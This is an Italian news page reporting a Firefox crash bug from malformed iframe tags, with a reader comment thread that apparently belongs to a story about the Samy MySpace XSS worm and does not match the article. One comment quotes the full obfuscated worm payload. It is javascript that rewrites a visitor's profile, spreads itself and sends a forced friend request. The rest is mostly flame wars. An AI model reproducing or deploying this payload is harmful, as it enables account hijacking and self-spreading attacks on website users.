Firefox, bugghetto con exploit

I browser di Mozilla Foundation, e forse anche Internet Explorer, sono afflitti da un bug sfruttabile da siti malevoli per mandarli in crash. In sé poco pericoloso, il buco ha già un suo exploit pubblico


Roma – La società di sicurezza Whitedust ha di recente pubblicato un exploit capace di mandare in crash Firefox e Mozilla.

Scoperta dal ricercatore di sicurezza Tom Ferris, la vulnerabilità su cui fa leva l’exploit affligge le più recenti versioni stabili di Firefox, inclusa la 1.0.7, e consiste nell’incorretta gestione di tag “iframe” malformati. Il problema è stato valutato da Secunia “non critico”, tuttavia potrebbe essere facilmente utilizzato da un sito per causare il blocco irreversibile di Firefox, Mozilla e Thunderbird.

Il bug non è sconosciuto agli sviluppatori di Mozilla.org: la sua segnalazione su Bugzilla risale infatti allo scorso agosto, e in Firefox 1.5 pare sia stato corretto a partire dalla Beta 2. È dunque probabile che con la pubblicazione dell’exploit Mozilla Foundation rilascerà una patch per Firefox 1.0.7 in tempi brevi.

Secondo quanto riportato a Whitedust da alcuni utenti, il problema sembra interessare anche Internet Explorer: se la notizia venisse confermata significherebbe che il bug interessa la quasi totalità degli utenti del Web.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    Come funziona?
    Come fa il worm ad infettare le pagine web delle persone che leggono un'altra pagina web (quella del profilo incriminato)?
    • Anonimo scrive:
      Re: Come funziona?
      - Scritto da: Anonimo
      Come fa il worm ad infettare le pagine web delle
      persone che leggono un'altra pagina web (quella
      del profilo incriminato)?così: (non mi ricordo dove l'ho preso)%lt;div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')"expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O%lt;F.length;O++){var I=F[O].split('=');S[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O%gt;0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. %lt;d'+'iv id='+AE+'D'+'IV%gt;'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','%lt;/td%gt;');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"%gt;%lt;/DIV%gt;
      • Anonimo scrive:
        Re: Come funziona?
        - Scritto da: Anonimo
        - Scritto da: Anonimo

        Come fa il worm ad infettare le pagine web delle

        persone che leggono un'altra pagina web (quella

        del profilo incriminato)?


        così: (non mi ricordo dove l'ho preso)
        [...]Ouch, mi sono sparite tutte le tabulazioni!!E i <
        sono da sostituirsi con
    • Anonimo scrive:
      Re: Come funziona?
      http://namb.la/popular/tech.html
  • Anonimo scrive:
    E noi osserviamo...
    Ad aiutare il worm nella sua diffusione sono intervenute alcune vulnerabilità presenti in Internet Explorer(linux)
    • Anonimo scrive:
      Re: E noi osserviamo...
      - Scritto da: Anonimo
      Ad aiutare il worm nella sua diffusione sono
      intervenute alcune vulnerabilità presenti in
      Internet Explorer
      mentre tu continuo ad osservare convulsivamente NOI CONTINUIAMO A GODERCI LA VITA resta ad osservare a ricompilare e a scrivere scemenze nei forum intanto c'è chi vive la vita
      • Anonimo scrive:
        Re: E noi osserviamo...
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        Ad aiutare il worm nella sua diffusione sono

        intervenute alcune vulnerabilità presenti in

        Internet Explorer



        mentre tu continuo ad osservare convulsivamente
        NOI CONTINUIAMO A GODERCI LA VITA resta ad
        osservare a ricompilare e a scrivere scemenze nei
        forum intanto c'è chi vive la vitaNon direi, visto che sei qui a postare.... :D
      • Anonimo scrive:
        Re: E noi osserviamo...
        - Scritto da: Anonimo
        - Scritto da: Anonimo

        Ad aiutare il worm nella sua diffusione sono

        intervenute alcune vulnerabilità presenti in

        Internet Explorer
        mentre tu continuo ad osservare
        convulsivamente NOI CONTINUIAMO A
        GODERCI LA VITA resta ad osservare a
        ricompilare e a scrivere scemenze nei
        forum intanto c'è chi vive la vitaTra un virus e l'altro :-)
      • KrecKer scrive:
        Re: E noi osserviamo...
        Sono d'accordo che alla fine sia polemica sterile...ma che ci sarà di tanto temibile a ricompilare un kernel? guarda che una macchina recente ci mette 5 min. e poi mica devi stare a guardare il gcc che compila! Va avanti anche da solo!Ciao
        • Anonimo scrive:
          Re: E noi osserviamo...
          - Scritto da: KrecKer
          Sono d'accordo che alla fine sia polemica
          sterile...

          ma che ci sarà di tanto temibile a ricompilare un
          kernel? guarda che una macchina recente ci mette
          5 min. e poi mica devi stare a guardare il gcc
          che compila! Va avanti anche da solo!

          Ciaonoi lo sappiamo, ma loro no...e si riempiono la bocca di parole tipo 'ricompilare il kernel', 'montare i dischi' etc etc...non sanno nemmeno d cosa parlano, non l'hanno nemmeno provato il linuccio...che pessimi.(linux)(apple)(c64)
          • Anonimo scrive:
            Re: E noi osserviamo...
            - Scritto da: Anonimo
            - Scritto da: KrecKer

            Sono d'accordo che alla fine sia polemica

            sterile...

            ma che ci sarà di tanto temibile a

            ricompilare un kernel? guarda che una

            macchina recente ci mette 5 min. e poi

            mica devi stare a guardare il gcc che

            compila! Va avanti anche da solo!
            noi lo sappiamo, ma loro no...
            e si riempiono la bocca di parole tipo
            'ricompilare il kernel', 'montare i dischi' etc
            etc...
            non sanno nemmeno d cosa parlano, non
            l'hanno nemmeno provato il linuccio...Peggio, secondo me, l'hanno provato non sono riusciti nemmeno a farlo partire e gli e' scoppiato il senso di inferiorita'. E pensare che alcuni fanno pure i sistemisti hehehe.
          • Guybrush scrive:
            Re: E noi osserviamo...
            [...]
            Peggio, secondo me, l'hanno provato non sono
            riusciti nemmeno a farlo partire e gli e'
            scoppiato il senso di inferiorita'. E pensare che
            alcuni fanno pure i sistemisti hehehe....e?Cioe', si parla di I.E. e di altri browser.Imho, visto il tipo di infezione, non e' tanto un problema di browser ma dell'applicazione che gestisce i forum.
            GT
          • Anonimo scrive:
            Finalmente
            - Scritto da: Guybrush
            Cioe', si parla di I.E. e di altri browser.
            Imho, visto il tipo di infezione, non e' tanto un
            problema di browser ma dell'applicazione che
            gestisce i forum.


            GT
      • Anonimo scrive:
        Re: E noi osserviamo...
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        Ad aiutare il worm nella sua diffusione sono

        intervenute alcune vulnerabilità presenti in

        Internet Explorer



        mentre tu continuo ad osservare convulsivamente
        NOI CONTINUIAMO A GODERCI LA VITA resta ad
        osservare a ricompilare e a scrivere scemenze nei
        forum intanto c'è chi vive la vitaC'è chi invece non fa altro che ricompilare il kernel di linux perchè è perennemente insoddisfatto e viene qui a fare lo sbruffoncello... a ognuno il suo passatempo!
    • Anonimo scrive:
      Re: E noi osserviamo...
      Miiiiiii!E figurati se per dritto o per rovescio non c'entra IE!Ma vi pagano o avete qualche turba repressa da linuxdipendenti? Ma datevi una calmata e continuate pure a raggiungere le alte vette orgasmiche con i vostri bei giocattolini! Se il mondo informatico gira quasi completamente con prodotti Microsoft non sarà mica tutta fuffa! Vuol dire che qualcuno (milioni) sono contenti così, senza troppe seghe mentali (come ve le fate voi, poverini).
      • Anonimo scrive:
        Re: E noi osserviamo...
        - Scritto da: Anonimo
        Miiiiiii!
        E figurati se per dritto o per rovescio non
        c'entra IE!
        Ma vi pagano o avete qualche turba repressa da
        linuxdipendenti? Ma datevi una calmata e
        continuate pure a raggiungere le alte vette
        orgasmiche con i vostri bei giocattolini! Se il
        mondo informatico gira quasi completamente con
        prodotti Microsoft non sarà mica tutta fuffa!
        Vuol dire che qualcuno (milioni) sono contenti
        così, senza troppe seghe mentali (come ve le fate
        voi, poverini).No IE non centrahttp://news.com.com/Security+flaw+touches+Windows+Media+Player%2C+IE/2100-1002_3-5899448.html?tag=nefd.top
      • Anonimo scrive:
        Re: E noi osserviamo...
        - Scritto da: Anonimo
        Se il
        mondo informatico gira quasi completamente con
        prodotti Microsoft non sarà mica tutta fuffa!
        Vuol dire che qualcuno (milioni) sono contenti
        così, senza troppe seghe mentali (come ve le fate
        voi, poverini).Sarà che la MS agisce (ed ha agito) come monopolista?Sarà che il 95% dei pc ha preistallato un suo prodotto?Sarà che l'utente medio, come te, non capiscie un caxxo di computer, non si informa, ed è contento così? (che tristezza)Continua a non farti seghe mentali...continua a beccarti worm e a infettare gli altri.Continua ad avere seri problemi di sicurezza e sii felice lo stesso.Continua sopratutto a rimpinguare le casse di uno degli uomini più ricchi del mondo.E mi raccomando...continua a fare quello che fanno gli altri...perchè "se lo fanno in milioni, dev'essere una cosa giusta".Poverino.
        • Anonimo scrive:
          Altro organismo unicellulare che parla..
          - Scritto da: Anonimo

          Sarà che la MS agisce (ed ha agito) come
          monopolista?
          Sarà che il 95% dei pc ha preistallato un suo
          prodotto?
          Sarà che l'utente medio, come te, non capiscie un
          caxxo di computer, non si informa, ed è contento
          così? (che tristezza)
          Continua a non farti seghe mentali...continua a
          beccarti worm e a infettare gli altri.
          Continua ad avere seri problemi di sicurezza e
          sii felice lo stesso.
          Continua sopratutto a rimpinguare le casse di uno
          degli uomini più ricchi del mondo.
          E mi raccomando...continua a fare quello che
          fanno gli altri...perchè "se lo fanno in milioni,
          dev'essere una cosa giusta".

          Poverino."Ad aiutare il worm nella sua diffusione sono intervenute alcune vulnerabilità presenti in Internet Explorer e altri browser"Non sapete leggere!! Suvvia, non ci sono più i troll di una volta!!! Sforzatevi di più e non ripetete le solite e ridicole frasi ripetute a memoria.(troll)
          • Anonimo scrive:
            Re: Altro organismo unicellulare che par
            - Scritto da:

            - Scritto da: Anonimo



            Sarà che la MS agisce (ed ha agito) come

            monopolista?

            Sarà che il 95% dei pc ha preistallato un suo

            prodotto?

            Sarà che l'utente medio, come te, non capiscie
            un

            caxxo di computer, non si informa, ed è contento

            così? (che tristezza)

            Continua a non farti seghe mentali...continua a

            beccarti worm e a infettare gli altri.

            Continua ad avere seri problemi di sicurezza e

            sii felice lo stesso.

            Continua sopratutto a rimpinguare le casse di
            uno

            degli uomini più ricchi del mondo.

            E mi raccomando...continua a fare quello che

            fanno gli altri...perchè "se lo fanno in
            milioni,

            dev'essere una cosa giusta".



            Poverino.

            "Ad aiutare il worm nella sua diffusione sono
            intervenute alcune vulnerabilità presenti in
            Internet Explorer e altri
            browser"

            Non sapete leggere!! Suvvia, non ci sono più i
            troll di una volta!!! Sforzatevi di più e non
            ripetete le solite e ridicole frasi ripetute a
            memoria.

            (troll)Essenzialmente, come al solito, il worm gira solo su windows.
    • Anonimo scrive:
      Non sai leggere
      - Scritto da: Anonimo
      Ad aiutare il worm nella sua diffusione sono
      intervenute alcune vulnerabilità presenti in
      Internet Explorer



      (linux)"Ad aiutare il worm nella sua diffusione sono intervenute alcune vulnerabilità presenti in Internet Explorer e altri browser"Oltre che IE ci sono altri browser (non specificati). Ergo oltre che analfabeta sei anche un troll (troll)
  • Anonimo scrive:
    Articolo gonfiato, si sentiva solo
    Ma dai, tutto questo articolone per un povero diciannovenne che stando tutto il giorno attaccato al piccì e non avendo amici se ne è fatti qualche milioncino così, tanto per non sentirsi solo...A parte gli scherzi, avete dimenticato di dire che il worm aggiungeva a tutte le pagine degli utenti , in fondo, la scritta "but most of all, Samy is my hero", davvero geniale.Ha messo del codice java malformato nella propria home page, e chiunque la visitasse il worm installava se stesso nelle home dei visitatori, aggiungndoli agli amici di Samy. Un giochino esponenziale, dopo poche ore aveva già un milione di amici...Tornando all'articolo, ne parlate come la nuova piaga del web, un attacco che in futuro farà danni enormi...Ha semplicemente sfruttato una vulnerabilità lasciata aperta dai gestori del sito, nulla di più.Da qui a farne un caso zero per un futuro terrificante ce ne passa...
    • Anonimo scrive:
      Re: Articolo gonfiato, si sentiva solo

      Ha semplicemente sfruttato una vulnerabilità
      lasciata aperta dai gestori del sito, nulla di
      più.beh considera che:1) e' il primo caso di "worm" che sfrutta un XSS2) il web e' PIENO di possibili XSS
Chiudi i commenti